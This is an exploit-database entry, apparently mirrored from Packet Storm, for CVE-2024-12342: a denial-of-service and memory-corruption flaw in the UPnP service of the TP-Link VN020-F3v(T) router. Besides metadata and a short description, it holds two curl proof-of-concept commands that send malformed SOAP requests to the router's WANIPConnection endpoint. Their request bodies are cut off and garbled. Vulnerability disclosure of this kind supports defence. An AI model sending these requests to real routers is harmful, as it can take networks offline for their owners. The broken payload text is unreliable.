Exploit Details
Basic Information
| Exploit Title | TP-Link VN020 F3v(T) TT_V6.2.1021 Denial of Service |
|---|---|
| Exploit ID | PACKETSTORM:190533 |
| Type | packetstorm |
| Published | 2025-04-17T00:00:00 |
| Modified | 2025-04-17T00:00:00 |
CVSS Information
| CVSS Score | 7.1 |
|---|---|
| Severity | HIGH |
| Vector | CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/SC:N/VI:N/SI:N/VA:H/SA:N |
CVE Information
- CVE-2024-12342
Exploit Description
Exploit Code
# Date: 10/22/2024
# Exploit Author: Mohamed Maatallah
# Vendor Homepage: https://www.tp-link.com
# Version: TT_V6.2.1021 (VN020-F3v(T))
# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
# CVE: CVE-2024-12342
Description:
Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router’s
UPnP implementation, affecting the WANIPConnection service. The
vulnerabilities allow unauthenticated attackers to cause denial of service
and potential memory corruption through malformed SOAP requests.
Proof of Concept 1 (Missing Parameters DoS):
curl -v -X POST “http://192.168.1.1:5431/control/WANIPConnection” \
-H “Content-Type: text/xml” \
-H “SOAPAction:
\”urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\”” \
-d ‘
Proof of Concept 2 (Memory Corruption):
curl -v -X POST “http://192.168.1.1:5431/control/WANIPConnection” \
-H “Content-Type: text/xml” \
-H “SOAPAction:
\”urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\”” \
-d ‘
10000;’)”‘